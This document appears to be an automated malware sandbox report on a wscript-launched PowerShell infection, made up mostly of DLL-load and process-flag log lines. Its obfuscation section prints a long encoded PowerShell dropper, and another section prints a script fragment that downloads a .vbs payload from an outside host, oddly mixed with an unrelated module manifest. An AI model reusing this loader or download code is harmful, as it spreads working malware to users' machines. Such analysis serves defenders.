Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: System.Management.Automation.pdb'J source: powershell.exe, 00000003.00000002.2189957906.000001DAB563D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2220195093.000001DACF904000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: 6?m.pdbpdbtem.pdb source: powershell.exe, 00000007.00000002.3493312845.00000263D8A09000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2412345329.0000023976E45000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ystem.pdbe source: powershell.exe, 00000000.00000002.2412345329.0000023976EAB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Target.pdbn source: powershell.exe, 00000000.00000002.2414714485.0000023977170000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2414714485.000002397712C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3496836394.00000263D8BFC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb" source: powershell.exe, 00000007.00000002.3493312845.00000263D8A09000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: em.Core.pdbk source: powershell.exe, 00000007.00000002.3493312845.00000263D89F4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: pdbpdblib.pdb source: powershell.exe, 00000000.00000002.2412345329.0000023976EAB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32D4X source: powershell.exe, 00000003.00000002.2219771232.000001DACF8A1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: em.Core.pdb source: powershell.exe, 00000007.00000002.3493312845.00000263D89F4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ll\System.pdbc source: powershell.exe, 00000007.00000002.3493312845.00000263D8A09000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.3496836394.00000263D8C5A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *on.pdb source: powershell.exe, 00000007.00000002.3493312845.00000263D8A59000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne';$Undsatdeoglyph = 1;Function Psykopaterne($Spleenens){$Diastem=$Spleenens.Length-$Undsatdeoglyph;$Noiler='SUBSTRIN';$Noiler+='G';For( $Undsat=5;$Undsat -lt $Diastem;$Undsat+=6){$Undramatisables+=$Spleenens.$Noiler.Invoke( $Undsat, $Undsatdeoglyph);}$Undramatisables;}function responsibly($Intraovarian129){ & ($Forgyldte) ($Intraovarian129);}$Skovtrernes=Psykopaterne 'nonamMHaydooDygtizCadeaiApplal Appel Mokkarepor/ Inds5Frak .Unde 0Talam W gsu(HappiWNonauiIrresnvivifd,ssocoTraktw,oressRabar SphecN fashTNonr, Kansa1Bes,t0Theop.Maint0Vap r; Bunt a.goWMaskei Pa.rnL.nia6S.ven4Syste;Petal VisoxAfg e6 Proc4Modst;Sanit Arm,nrOrdfovZ,nag: ista1Uvaer2Stopf1Sixti.Skrav0 Re.o)Photo Ga esGBagsteOvergc Cr.tkQuadroDoggi/thaum2 Vald0Amt,b1Physi0 Isse0N.gle1Phaet0Subco1Stigr SweeFSki.oiFin,erm duleK aphfGeneroClangx frem/Prale1Unsea2,ncul1 Caus.P.dio0S.asi ';$Hir=Psykopaterne 'PipesUnonresTmrerePernarUn ha-r,ferABiplag O hee RingnSixtytevent ';$Orloven=Psykopaterne 'DatabhUncoutNoncotfornupC,mpas Prad:Kodni/ .ypo/UnspiwAfmgtwArtifwPerfe. HolgeConfer,wirpph gga-Twi.erSkulaoStiftySpir,aProfilTvrli-Uni,pcTid.arPi gioReptiw PuttnAn id. 
DediiChadondeflofIndesoAcras/ PrdiwLenshhHotbr/CatapSStempa nagorGuleroVaabetChesthByggerLan,bu Vi,kmtrich.Adva,jLon.opvermibCamph> He.uhGarant ForbtBlamapItalisGypso: Must/Di ci/ Methw Undewforurw,ipse.Prom aPar.plSlmnimMobedr ConswVejgra,rogrd Togf.Barsecpara oStjdemCitat/Anywhw CholhSkaks/StyreS SwotaSheikrRutebo Sub.tVestshS,regr,emicuSepalmGela.. StikjNiddepSilicbLgnag ';$Syndsbekendelsens=Psykopaterne ' Insk>Strou ';$Forgyldte=Psykopaterne 'ShoppiMeasueEtta,xpoo.a ';$grydeskeers='Idrtsparkerne';$Advoker = Psykopaterne 'EftereGr,ndc StrihSa,lioDeta. Stad%RecidaGainspUlyksp Ud rd ilmna,glertForhaa M,no%Renai\.igenA.onathLandfoHash rSupponTrykitHailerL,cie.Slid.P Av.siTr,kabUnexo Bildk&Super&Sig l skyfoeSha.ec Rabah,ragioUnder OverftDisbr ';responsibly (Psykopaterne 'Farin$CyclogkontrlFr.byoCity,bRaakoaTematlNy.ed: A arBEpipto NitreLabourMilieeCla,s=Stran(,ragecOve hmI,terd,husc Va.df/Deminc.rape do b$OutbeA,udsedTu.thv.ttitoTalsykstab,e Outfrc alo)Res u ');responsibly (Psykopaterne 'Kalor$ E ebgAp.relKnn,soephyrbNa,uaaHonorlCompu: ,elgCF.rstrBayera Plumc,orthkConflaBrndsjStu saSvag,cIndl.kAbiga= Co e$.merkOBagvar ,rnelFolieoSyn ev,ngore Overn fluo. Col
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F27557 pushad ; retf 0_2_00007FF848F2755D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F26D77 push esp; retf 0_2_00007FF848F26D78
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F27977 push esp; retf 0_2_00007FF848F27978
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F27407 push ds; retf 0_2_00007FF848F2740F
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848FF7613 push edi; ret 0_2_00007FF848FF7616
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF848FE0D6C push eax; ret 3_2_00007FF848FE0D6D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF848F27C57 push esp; retf 7_2_00007FF848F27C58

          Boot Survival

          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htb09www.fornid.com/wh/List%20of%20rzmhquirzmhd%20itzmhms%20and%20szmhrviczmhs.pdf';getit -fz $flol -oulv 'htb09www.pinzmhapplzmhtzmhch.azmh/ov/wh.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this mod

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
